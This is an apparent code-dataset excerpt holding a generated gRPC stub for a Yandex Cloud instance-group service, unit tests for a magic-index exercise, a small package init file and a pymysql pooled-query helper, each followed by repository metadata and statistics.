def CreateFromYaml(self, request, context):
"""Creates an instance group in the specified folder from a YAML file.
This method starts an operation that can be cancelled by another operation.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Update(self, request, context):
"""Updates the specified instance group.
This method starts an operation that can be cancelled by another operation.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateFromYaml(self, request, context):
"""Updates the specified instance group from a YAML file.
This method starts an operation that can be cancelled by another operation.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Stop(self, request, context):
"""Stops the specified instance group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Start(self, request, context):
"""Starts the specified instance group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Delete(self, request, context):
"""Deletes the specified instance group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListInstances(self, request, context):
"""Lists instances for the specified instance group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteInstances(self, request, context):
"""Delete instances from the instance group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def StopInstances(self, request, context):
"""Stop instances from the instance group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListOperations(self, request, context):
"""Lists operations for the specified instance group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListLogRecords(self, request, context):
"""Lists logs for the specified instance group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListAccessBindings(self, request, context):
"""Lists existing access bindings for the specified instance group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetAccessBindings(self, request, context):
"""Sets access bindings for the specified instance group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateAccessBindings(self, request, context):
"""Updates access bindings for the specified instance group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ResumeProcesses(self, request, context):
"""Resumes all processes regarding management of the specified instance group,
i.e. scaling, checking instances' health, auto-healing and updating them.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PauseProcesses(self, request, context):
"""Pauses all processes regarding management of the specified instance group,
i.e. scaling, checking instances' health, auto-healing and updating them. Running instances are not stopped.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_InstanceGroupServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'Get': grpc.unary_unary_rpc_method_handler(
servicer.Get,
request_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.GetInstanceGroupRequest.FromString,
response_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__pb2.InstanceGroup.SerializeToString,
),
'List': grpc.unary_unary_rpc_method_handler(
servicer.List,
request_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupsResponse.SerializeToString,
),
'Create': grpc.unary_unary_rpc_method_handler(
servicer.Create,
request_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.CreateInstanceGroupRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'CreateFromYaml': grpc.unary_unary_rpc_method_handler(
servicer.CreateFromYaml,
request_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.CreateInstanceGroupFromYamlRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Update': grpc.unary_unary_rpc_method_handler(
servicer.Update,
request_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.UpdateInstanceGroupRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'UpdateFromYaml': grpc.unary_unary_rpc_method_handler(
servicer.UpdateFromYaml,
request_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.UpdateInstanceGroupFromYamlRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Stop': grpc.unary_unary_rpc_method_handler(
servicer.Stop,
request_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.StopInstanceGroupRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Start': grpc.unary_unary_rpc_method_handler(
servicer.Start,
request_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.StartInstanceGroupRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Delete': grpc.unary_unary_rpc_method_handler(
servicer.Delete,
request_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.DeleteInstanceGroupRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'ListInstances': grpc.unary_unary_rpc_method_handler(
servicer.ListInstances,
request_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupInstancesRequest.FromString,
response_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupInstancesResponse.SerializeToString,
),
'DeleteInstances': grpc.unary_unary_rpc_method_handler(
servicer.DeleteInstances,
request_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.DeleteInstancesRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'StopInstances': grpc.unary_unary_rpc_method_handler(
servicer.StopInstances,
request_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.StopInstancesRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'ListOperations': grpc.unary_unary_rpc_method_handler(
servicer.ListOperations,
request_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupOperationsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupOperationsResponse.SerializeToString,
),
'ListLogRecords': grpc.unary_unary_rpc_method_handler(
servicer.ListLogRecords,
request_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupLogRecordsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupLogRecordsResponse.SerializeToString,
),
'ListAccessBindings': grpc.unary_unary_rpc_method_handler(
servicer.ListAccessBindings,
request_deserializer=yandex_dot_cloud_dot_access_dot_access__pb2.ListAccessBindingsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_access_dot_access__pb2.ListAccessBindingsResponse.SerializeToString,
),
'SetAccessBindings': grpc.unary_unary_rpc_method_handler(
servicer.SetAccessBindings,
request_deserializer=yandex_dot_cloud_dot_access_dot_access__pb2.SetAccessBindingsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'UpdateAccessBindings': grpc.unary_unary_rpc_method_handler(
servicer.UpdateAccessBindings,
request_deserializer=yandex_dot_cloud_dot_access_dot_access__pb2.UpdateAccessBindingsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'ResumeProcesses': grpc.unary_unary_rpc_method_handler(
servicer.ResumeProcesses,
request_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ResumeInstanceGroupProcessesRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'PauseProcesses': grpc.unary_unary_rpc_method_handler(
servicer.PauseProcesses,
request_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.PauseInstanceGroupProcessesRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'yandex.cloud.compute.v1.instancegroup.InstanceGroupService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class InstanceGroupService(object):
"""A set of methods for managing InstanceGroup resources.
"""
@staticmethod
def Get(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/Get',
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.GetInstanceGroupRequest.SerializeToString,
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__pb2.InstanceGroup.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def List(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/List',
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupsRequest.SerializeToString,
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Create(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/Create',
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.CreateInstanceGroupRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def CreateFromYaml(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/CreateFromYaml',
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.CreateInstanceGroupFromYamlRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Update(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/Update',
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.UpdateInstanceGroupRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateFromYaml(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/UpdateFromYaml',
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.UpdateInstanceGroupFromYamlRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Stop(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/Stop',
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.StopInstanceGroupRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Start(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/Start',
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.StartInstanceGroupRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Delete(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/Delete',
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.DeleteInstanceGroupRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListInstances(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/ListInstances',
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupInstancesRequest.SerializeToString,
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupInstancesResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteInstances(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/DeleteInstances',
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.DeleteInstancesRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def StopInstances(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/StopInstances',
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.StopInstancesRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListOperations(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/ListOperations',
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupOperationsRequest.SerializeToString,
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupOperationsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListLogRecords(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/ListLogRecords',
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupLogRecordsRequest.SerializeToString,
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupLogRecordsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListAccessBindings(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/ListAccessBindings',
yandex_dot_cloud_dot_access_dot_access__pb2.ListAccessBindingsRequest.SerializeToString,
yandex_dot_cloud_dot_access_dot_access__pb2.ListAccessBindingsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetAccessBindings(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/SetAccessBindings',
yandex_dot_cloud_dot_access_dot_access__pb2.SetAccessBindingsRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateAccessBindings(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/UpdateAccessBindings',
yandex_dot_cloud_dot_access_dot_access__pb2.UpdateAccessBindingsRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ResumeProcesses(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/ResumeProcesses',
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ResumeInstanceGroupProcessesRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def PauseProcesses(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/PauseProcesses',
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.PauseInstanceGroupProcessesRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 57.175793 | 182 | 0.723085 | 3,851 | 39,680 | 6.967022 | 0.04752 | 0.039583 | 0.061573 | 0.074767 | 0.91312 | 0.91312 | 0.910772 | 0.866865 | 0.860417 | 0.802982 | 0 | 0.007334 | 0.216482 | 39,680 | 693 | 183 | 57.258297 | 0.855645 | 0.052419 | 0 | 0.586325 | 1 | 0 | 0.103311 | 0.074142 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068376 | false | 0 | 0.008547 | 0.032479 | 0.11453 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1770e9f496a600c615075bec4cfe06e9e02c769a | 2,120 | py | Python | recursion_and_dynamic_programming/magic_index/test.py | hanjasn/ctci | 69c8c65d71e7f6e88b669dc402e64a0cf6223fbf | [
"MIT"
] | null | null | null | recursion_and_dynamic_programming/magic_index/test.py | hanjasn/ctci | 69c8c65d71e7f6e88b669dc402e64a0cf6223fbf | [
"MIT"
] | null | null | null | recursion_and_dynamic_programming/magic_index/test.py | hanjasn/ctci | 69c8c65d71e7f6e88b669dc402e64a0cf6223fbf | [
"MIT"
] | null | null | null | import unittest
from solution import *
from time import time
class FindingMagicIndexNonDistinctIntegersTest(unittest.TestCase):
def setUp(self) -> None:
self.sol = Solution1()
def test_1(self) -> None:
arr = [-3, -2, -1, 0, 4, 7, 9, 11]
self.assertEqual(4, self.sol.find_magic_index(arr))
def test_2(self) -> None:
arr = [1, 2, 3, 4, 5, 6, 7]
self.assertEqual(-1, self.sol.find_magic_index(arr))
def test_3(self) -> None:
arr = []
self.assertEqual(-1, self.sol.find_magic_index(arr))
def test_4(self) -> None:
arr = [100] * 101
self.assertEqual(100, self.sol.find_magic_index(arr))
def test_5(self) -> None:
arr = [i for i in range(1, 10**6)]
start = time()
self.sol.find_magic_index(arr)
print(f'{time() - start:.6f} seconds')
def test_6(self) -> None:
arr = [i for i in range(1, 10**7)]
start = time()
self.sol.find_magic_index(arr)
print(f'{time() - start:.6f} seconds')
class FindMagicIndexDistinctIntegersTest(unittest.TestCase):
def setUp(self) -> None:
self.sol = Solution2()
def test_1(self) -> None:
arr = [-3, -2, -1, 0, 4, 7, 9, 11]
self.assertEqual(4, self.sol.find_magic_index(arr))
def test_2(self) -> None:
arr = [1, 2, 3, 4, 5, 6, 7]
self.assertEqual(-1, self.sol.find_magic_index(arr))
def test_3(self) -> None:
arr = []
self.assertEqual(-1, self.sol.find_magic_index(arr))
def test_4(self) -> None:
arr = [i for i in range(1, 10**7)]
start = time()
self.sol.find_magic_index(arr)
print(f'{time() - start:.6f} seconds')
def test_5(self) -> None:
arr = [i for i in range(1, 10**8)]
start = time()
self.sol.find_magic_index(arr)
print(f'{time() - start:.6f} seconds')
def test_6(self) -> None:
arr = [-1] * 10**9
start = time()
self.sol.find_magic_index(arr)
print(f'{time() - start:.6f} seconds') | 29.859155 | 66 | 0.550472 | 303 | 2,120 | 3.732673 | 0.148515 | 0.099027 | 0.116711 | 0.169761 | 0.83908 | 0.83908 | 0.83908 | 0.83908 | 0.748895 | 0.748895 | 0 | 0.057448 | 0.293868 | 2,120 | 71 | 67 | 29.859155 | 0.698063 | 0 | 0 | 0.781818 | 0 | 0 | 0.066007 | 0 | 0 | 0 | 0 | 0 | 0.127273 | 1 | 0.254545 | false | 0 | 0.054545 | 0 | 0.345455 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
178a304045401ab4665df63bdcaf2b5aaef23f82 | 310 | py | Python | src/ebonite/build/runner/__init__.py | geffy/ebonite | 2d85eeca44ac1799e743bafe333887712e325060 | [
"Apache-2.0"
] | 1 | 2019-11-27T14:33:45.000Z | 2019-11-27T14:33:45.000Z | src/ebonite/build/runner/__init__.py | geffy/ebonite | 2d85eeca44ac1799e743bafe333887712e325060 | [
"Apache-2.0"
] | null | null | null | src/ebonite/build/runner/__init__.py | geffy/ebonite | 2d85eeca44ac1799e743bafe333887712e325060 | [
"Apache-2.0"
] | null | null | null | from .base import RunnerBase
from .simple_docker import DefaultDockerRegistry, DockerImage, DockerServiceInstance, RemoteDockerRegistry, \
SimpleDockerRunner
__all__ = ['RunnerBase', 'DefaultDockerRegistry', 'DockerImage', 'DockerServiceInstance',
'RemoteDockerRegistry', 'SimpleDockerRunner']
| 44.285714 | 109 | 0.793548 | 20 | 310 | 12.05 | 0.6 | 0.26556 | 0.439834 | 0.605809 | 0.755187 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.119355 | 310 | 6 | 110 | 51.666667 | 0.882784 | 0 | 0 | 0 | 0 | 0 | 0.325806 | 0.135484 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
178a69e31c4d7b231322e7517145b1de7fd9bba1 | 2,325 | py | Python | app/utils/db_utils.py | a1136395507/Blog | e890dbe24bd2c3a82dad55e90f717db59a3e51a1 | [
"Unlicense"
] | null | null | null | app/utils/db_utils.py | a1136395507/Blog | e890dbe24bd2c3a82dad55e90f717db59a3e51a1 | [
"Unlicense"
] | null | null | null | app/utils/db_utils.py | a1136395507/Blog | e890dbe24bd2c3a82dad55e90f717db59a3e51a1 | [
"Unlicense"
] | null | null | null | import pymysql
from flask import current_app
# 第一一个数据库连接池的方法的类,用于处理链接,查找, 断开链接等功能
# 当使用某种方法的时候直接调用即可
class UserSQLHelper(object):
@staticmethod
# 处理链接功能,
def open(cursor=pymysql.cursors.DictCursor):
# 从当前的app中的配置文件中去获取连接池
POOL = current_app.config["SQL_USER_POOL"]
# 链接
conn = POOL.connection()
cursor = conn.cursor(cursor=cursor)
return conn, cursor
@staticmethod
# 处理关闭连接的功能
def close(conn, cursor):
conn.commit()
cursor.close()
conn.close()
@classmethod
# 处理查找一个的功能,定义成类方法,
def fetch_one(cls, sql, *args, cursor=pymysql.cursors.DictCursor):
conn, cursor = cls.open(cursor)
if args:
cursor.execute(sql, args)
else:
cursor.execute(sql)
obj = cursor.fetchone()
cls.close(conn, cursor)
return obj
@classmethod
# 处理查找多个的功能
def fetch_all(cls, sql, *args, cursor=pymysql.cursors.DictCursor):
conn, cursor = cls.open(cursor)
if args:
cursor.execute(sql, args)
else:
cursor.execute(sql)
obj = cursor.fetchall()
cls.close(conn, cursor)
return obj
class ProductSQLHelper(object):
@staticmethod
# 处理链接功能,
def open(cursor=pymysql.cursors.DictCursor):
# 从当前的app中的配置文件中去获取连接池
POOL = current_app.config["SQL_PRODUCT_POOL"]
# 链接
conn = POOL.connection()
cursor = conn.cursor(cursor=cursor)
return conn, cursor
@staticmethod
# 处理关闭连接的功能
def close(conn, cursor):
conn.commit()
cursor.close()
conn.close()
@classmethod
# 处理查找一个的功能,定义成类方法,
def fetch_one(cls, sql, *args, cursor=pymysql.cursors.DictCursor):
conn, cursor = cls.open(cursor)
if args:
cursor.execute(sql, args)
else:
cursor.execute(sql)
obj = cursor.fetchone()
cls.close(conn, cursor)
return obj
@classmethod
# 处理查找多个的功能
def fetch_all(cls, sql, *args, cursor=pymysql.cursors.DictCursor):
conn, cursor = cls.open(cursor)
if args:
cursor.execute(sql, args)
else:
cursor.execute(sql)
obj = cursor.fetchall()
cls.close(conn, cursor)
return obj
| 25 | 70 | 0.591398 | 244 | 2,325 | 5.590164 | 0.204918 | 0.102639 | 0.093842 | 0.131965 | 0.90176 | 0.90176 | 0.90176 | 0.90176 | 0.90176 | 0.90176 | 0 | 0 | 0.307527 | 2,325 | 92 | 71 | 25.271739 | 0.847205 | 0.082151 | 0 | 0.909091 | 0 | 0 | 0.013686 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.121212 | false | 0 | 0.030303 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
